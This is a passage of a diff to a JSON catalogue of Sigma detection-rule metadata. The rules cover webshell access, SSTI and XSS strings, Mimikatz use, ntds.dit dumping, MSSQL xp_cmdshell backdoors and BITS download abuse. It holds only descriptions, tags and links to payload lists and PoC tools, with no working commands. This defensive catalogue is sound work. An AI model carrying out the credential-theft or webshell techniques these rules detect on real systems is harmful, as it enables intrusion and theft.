"web_ssti_in_access_logs.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection", - "https://github.com/payloadbox/ssti-payloads", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_ssti_in_access_logs.yml" - ], - "tags": "No established tags" - }, - "uuid": "ada3bc4f-f0fd-42b9-ba91-e105e8af7342", - "value": "Server Side Template Injection Strings" - }, - { - "description": "Detects known suspicious (default) user-agents related to scanning/recon tools", - "meta": { - "author": "Nasreddine Bencherchali, Tim Shelton", - "creation_date": "2022/07/19", - "falsepositive": [ - "Unknown" - ], - "filename": "web_susp_useragents.yml", - "level": "medium", - "logsource.category": "webserver", 
- "logsource.product": "No established product", - "refs": [ - "https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb", - "https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst", - "https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_susp_useragents.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "19aa4f58-94ca-45ff-bc34-92e533c0994a", - "value": "Suspicious User-Agents Related To Recon Tools" - }, - { - "description": "Detects suspicious windows strins in URI which could indicate possible exfiltration or webshell communication", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/06", - "falsepositive": [ - "Legitimate application and websites that use windows paths in their URL" - ], - "filename": "web_susp_windows_path_uri.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_susp_windows_path_uri.yml" - ], - "tags": [ - "attack.persistence", - "attack.exfiltration", - "attack.t1505.003" - ] - }, - "uuid": "9f6a34b4-2688-4eb7-a7f5-e39fef573d0e", - "value": "Suspicious Windows Strings In URI" - }, - { - "description": "Detects access to DEWMODE webshell as described in FIREEYE report", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/02/22", - "falsepositive": [ - "Unknown" - ], - "filename": "web_unc2546_dewmode_php_webshell.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - 
"https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_unc2546_dewmode_php_webshell.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ] - }, - "uuid": "fdf96c90-42d5-4406-8a9c-14a2c9a016b5", - "value": "DEWMODE Webshell Access" - }, - { - "description": "Certain strings in the uri_query field when combined with null referer and null user agent can indicate activity associated with the webshell ReGeorg.", - "meta": { - "author": "Cian Heasley", - "creation_date": "2020/08/04", - "falsepositive": [ - "Web applications that use the same URL parameters as ReGeorg" - ], - "filename": "web_webshell_regeorg.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://community.rsa.com/community/products/netwitness/blog/2019/02/19/web-shells-and-netwitness-part-3", - "https://github.com/sensepost/reGeorg", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_webshell_regeorg.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ] - }, - "uuid": "2ea44a60-cfda-11ea-87d0-0242ac130003", - "value": "Webshell ReGeorg Detection Via Web Logs" - }, - { - "description": "Detects Windows Webshells that use GET requests via access logs", - "meta": { - "author": "Florian Roth, Nasreddine Bencherchali", - "creation_date": "2017/02/19", - "falsepositive": [ - "Web sites like wikis with articles on os commands and pages that include the os commands in the URLs", - "User searches in search boxes of the respective website" - ], - "filename": "web_win_webshells_in_access_logs.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://bad-jubies.github.io/RCE-NOW-WHAT/", - "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_win_webshells_in_access_logs.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ] - }, - "uuid": "7ff9db12-1b94-4a79-ba68-a2402c5d6729", - "value": "Windows Webshell Strings" - }, - { - "description": "Detects XSS attempts injected via GET requests in access logs", - "meta": { - "author": "Saw Win Naung, Nasreddine Bencherchali", - "creation_date": "2021/08/15", - "falsepositive": [ - "JavaScripts,CSS Files and PNG files", - "User searches in search boxes of the respective website", - "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" - ], - "filename": "web_xss_in_access_logs.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://github.com/payloadbox/xss-payload-list", - "https://portswigger.net/web-security/cross-site-scripting/contexts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_xss_in_access_logs.yml" - ], - "tags": "No established tags" - }, - "uuid": "65354b83-a2ea-4ea6-8414-3ab38be0d409", - "value": "Cross Site Scripting Strings" + "uuid": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", + "value": "Koh Default Named Pipes" }, { "description": "This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)", 
@@ -13355,834 +3410,6 @@ "uuid": "06d71506-7beb-4f22-8888-e2e5e2ca7fd8", "value": "Mimikatz Use" }, - { - "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", - "meta": { - "author": "Florian Roth, Zach Mathis", - "creation_date": "2020/01/15", - "falsepositive": [ - "Unknown" - ], - "filename": "win_audit_cve.yml", - "level": "critical", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/VM_vivisector/status/1217190929330655232", - "https://twitter.com/DidierStevens/status/1217533958096924676", - "https://twitter.com/FlemmingRiis/status/1217147415482060800", - "https://www.youtube.com/watch?v=ebmW42YYveI", - "https://nullsec.us/windows-event-log-audit-cve/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_audit_cve.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068", - "attack.defense_evasion", - "attack.t1211", - "attack.credential_access", - "attack.t1212", - "attack.lateral_movement", - "attack.t1210", - "attack.impact", - "attack.t1499.004" - ] - }, - "uuid": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", - "value": "Audit CVE Event" - }, - { - "description": "This detection method points out highly relevant Antivirus events", - "meta": { - "author": "Florian Roth, Arnim Rupp", - "creation_date": "2017/02/19", - "falsepositive": [ - "Some software piracy tools (key generators, cracks) are classified as hack tools" - ], - "filename": "win_av_relevant_match.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - 
"https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31", - "https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed", - "https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_av_relevant_match.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588" - ] - }, - "uuid": "78bc5783-81d9-4d73-ac97-59f6db4f72a8", - "value": "Relevant Anti-Virus Event" - }, - { - "description": "An application has been removed. Check if it is critical.", - "meta": { - "author": "frack113", - "creation_date": "2022/01/28", - "falsepositive": [ - "Unknown" - ], - "filename": "win_builtin_remove_application.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_builtin_remove_application.yml" - ], - "tags": [ - "attack.impact", - "attack.t1489" - ] - }, - "uuid": "570ae5ec-33dc-427c-b815-db86228ad43e", - "value": "Application Uninstalled" - }, - { - "description": "Detects potential abuse of ntdsutil to dump ntds.dit database", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/14", - "falsepositive": [ - "Legitimate backup operation/creating shadow copies" - ], - "filename": "win_esent_ntdsutil_abuse.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/mgreen27/status/1558223256704122882", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_esent_ntdsutil_abuse.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": 
"e6e88853-5f20-4c4a-8d26-cd469fd8d31f", - "value": "Ntdsutil Abuse" - }, - { - "description": "Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/14", - "falsepositive": [ - "Legitimate backup operation/creating shadow copies" - ], - "filename": "win_esent_ntdsutil_abuse_susp_location.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/mgreen27/status/1558223256704122882", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_esent_ntdsutil_abuse_susp_location.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "94dc4390-6b7c-4784-8ffc-335334404650", - "value": "Dump Ntds.dit To Suspicious Location" - }, - { - "description": "Detects MSI package installation from suspicious locations", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/31", - "falsepositive": [ - "Some false positives may occur depending on the environnement" - ], - "filename": "win_msi_install_from_susp_locations.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_msi_install_from_susp_locations.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "c7c8aa1c-5aff-408e-828b-998e3620b341", - "value": "MSI Installation From Suspicious Locations" - }, - { - "description": "Detects installation of a remote msi file from web.", - "meta": { - "author": "Stamatis Chatzimangou", - "creation_date": "2022/10/23", - 
"falsepositive": [ - "Unknown" - ], - "filename": "win_msi_install_from_web.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/_st0pp3r_/status/1583922009842802689", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_msi_install_from_web.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218", - "attack.t1218.007" - ] - }, - "uuid": "5594e67a-7f92-4a04-b65d-1a42fd824a60", - "value": "MSI Installation From Web" - }, - { - "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/13", - "falsepositive": [ - "Rare legitimate administrative activity" - ], - "filename": "win_mssql_add_sysadmin_account.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_add_sysadmin_account.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "08200f85-2678-463e-9c32-88dce2f073d1", - "value": "MSSQL Add Account To Sysadmin Role" - }, - { - "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/13", - "falsepositive": [ - "This event should only fire when an administrator is modifying the audit policy. 
Which should be a rare occurrence once it's set up" - ], - "filename": "win_mssql_disable_audit_settings.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", - "https://docs.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16", - "https://docs.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_disable_audit_settings.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", - "value": "MSSQL Disable Audit Settings" - }, - { - "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", - "meta": { - "author": "Denis Szadkowski, DIRT / DCSO CyTec", - "creation_date": "2022/10/09", - "falsepositive": [ - "Legitimate extended stored procedures named maggie" - ], - "filename": "win_mssql_sp_maggie.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_sp_maggie.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546" - ] - }, - "uuid": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", - "value": "MSSQL Extended Stored Procedure Backdoor Maggie" - }, - { - "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. 
A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/13", - "falsepositive": [ - "Legitimate use of the feature by administrators (rare)" - ], - "filename": "win_mssql_sp_procoption_set.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", - "https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_sp_procoption_set.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", - "value": "MSSQL SPProcoption Set" - }, - { - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/12", - "falsepositive": [ - "Unknown" - ], - "filename": "win_mssql_xp_cmdshell_audit_log.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", - "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_xp_cmdshell_audit_log.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "7f103213-a04e-4d59-8261-213dddf22314", - "value": "MSSQL XPCmdshell Suspicious Execution" - }, - { - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", - "meta": { - "author": "Nasreddine Bencherchali", - 
"creation_date": "2022/07/12", - "falsepositive": [ - "Legitimate enable/disable of the setting", - "Note that since the event contain the change for both values. This means that this will trigger on both enable and disable" - ], - "filename": "win_mssql_xp_cmdshell_change.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", - "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_xp_cmdshell_change.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "d08dd86f-681e-4a00-a92c-1db218754417", - "value": "MSSQL XPCmdshell Option Change" - }, - { - "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/09/01", - "falsepositive": [ - "Legitimate Atera agent installation" - ], - "filename": "win_software_atera_rmm_agent_install.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_software_atera_rmm_agent_install.yml" - ], - "tags": [ - "attack.t1219" - ] - }, - "uuid": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", - "value": "Atera Agent Installation" - }, - { - "description": "Detects backup catalog deletions", - "meta": { - "author": "Florian Roth (rule), Tom U. 
@c_APT_ure (collection)", - "creation_date": "2017/05/12", - "falsepositive": [ - "Unknown" - ], - "filename": "win_susp_backup_delete.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx", - "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_susp_backup_delete.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ] - }, - "uuid": "9703792d-fd9a-456d-a672-ff92efe4806a", - "value": "Backup Catalog Deleted" - }, - { - "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/05/09", - "falsepositive": [ - "MsMpEng.exe can crash when C:\\ is full" - ], - "filename": "win_susp_msmpeng_crash.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5", - "https://technet.microsoft.com/en-us/library/security/4022344", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_susp_msmpeng_crash.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1211", - "attack.t1562.001" - ] - }, - "uuid": "6c82cf5c-090d-4d57-9188-533577631108", - "value": "Microsoft Malware Protection Engine Crash" - }, - { - "description": "Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688", - "meta": { - "author": "Florian Roth, wagga", - "creation_date": "2020/02/29", - "falsepositive": [ - "Unknown" - ], - "filename": "win_vul_cve_2020_0688.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - 
"https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/", - "https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_vul_cve_2020_0688.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "d6266bf5-935e-4661-b477-78772735a7cb", - "value": "CVE-2020-0688 Exploitation via Eventlog" - }, - { - "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/11/22", - "falsepositive": [ - "Other MSI packages for which your admins have used that name" - ], - "filename": "win_vul_cve_2021_41379.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/klinix5/InstallerFileTakeOver", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_vul_cve_2021_41379.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", - "value": "LPE InstallerFileTakeOver PoC CVE-2021-41379" - }, - { - "description": "Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. 
You need configure applocker and log collect to receive these events.", - "meta": { - "author": "Pushkarev Dmitry", - "creation_date": "2020/06/28", - "falsepositive": [ - "Need tuning applocker or add exceptions in SIEM" - ], - "filename": "win_applocker_file_was_not_allowed_to_run.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/using-event-viewer-with-applocker", - "https://nxlog.co/documentation/nxlog-user-guide/applocker.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1059.001", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.006", - "attack.t1059.007" - ] - }, - "uuid": "401e5d00-b944-11ea-8f9a-00163ecd60ae", - "value": "File Was Not Allowed To Run" - }, - { - "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. 
Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/06/28", - "falsepositive": [ - "Unknown" - ], - "filename": "win_bits_client_susp_domain.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", - "https://twitter.com/malmoeb/status/1535142803075960832", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_domain.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" - ] - }, - "uuid": "d635249d-86b5-4dad-a8c7-d7272b788586", - "value": "Suspicious Download with BITS from Suspicious TLD" - }, - { - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "meta": { - "author": "frack113", - "creation_date": "2022/03/01", - "falsepositive": [ - "Administrator PowerShell scripts" - ], - "filename": "win_bits_client_susp_local_file.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_local_file.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" - ] - }, - "uuid": 
"b85e5894-9b19-4d86-8c87-a2f3b81f0521", - "value": "Suspicious Download File Extension with BITS" - }, - { - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/06/28", - "falsepositive": [ - "Administrator PowerShell scripts" - ], - "filename": "win_bits_client_susp_local_folder.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_local_folder.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" - ] - }, - "uuid": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", - "value": "Download with BITS to Suspicious Folder" - }, - { - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "meta": { - "author": "frack113", - "creation_date": "2022/03/01", - "falsepositive": [ - "Administrator PowerShell scripts" - ], - "filename": "win_bits_client_susp_powershell_job.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_powershell_job.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" - ] - }, - "uuid": "fe3a2d49-f255-4d10-935c-bda7391108eb", - "value": "Suspicious Task Added by Powershell" - }, - { - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "meta": { - "author": "frack113", - "creation_date": "2022/03/01", - "falsepositive": [ - "Administrator PowerShell scripts" - ], - "filename": "win_bits_client_susp_use_bitsadmin.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_use_bitsadmin.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" - ] - }, - "uuid": "1ff315dc-2a3a-4b71-8dde-873818d25d39", - "value": "Suspicious Task Added by Bitsadmin" - }, - { - "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. 
Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/06/10", - "falsepositive": [ - "Other legitimate domains used by software updaters" - ], - "filename": "win_bits_client_uncommon_domain.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", - "https://twitter.com/malmoeb/status/1535142803075960832", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_uncommon_domain.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" - ] - }, - "uuid": "6d44fb93-e7d2-475c-9d3d-54c9c1e33427", - "value": "Suspicious Uncommon Download with BITS from Suspicious TLD" - }, - { - "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. 
It often means the file's signature is revoked or expired", - "meta": { - "author": "Florian Roth, Nasreddine Bencherchali", - "creation_date": "2022/01/20", - "falsepositive": [ - "Antivirus products" - ], - "filename": "win_codeintegrity_attempted_dll_load.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/SBousseaden/status/1483810148602814466", - "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "f8931561-97f5-4c46-907f-0a4a592e47a7", - "value": "Code Integrity Attempted DLL Load" - }, - { - "description": "Detects blocked load attempts of revoked drivers", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/11/10", - "falsepositive": [ - "Unknown" - ], - "filename": "win_codeintegrity_revoked_driver.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/wdormann/status/1590434950335320065", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543" - ] - }, - "uuid": "9b72b82d-f1c5-4632-b589-187159bc6ec1", - "value": "Block Load Of Revoked Driver" - }, - { - "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/11/10", - "falsepositive": [ - "Unknown" - ], - "filename": 
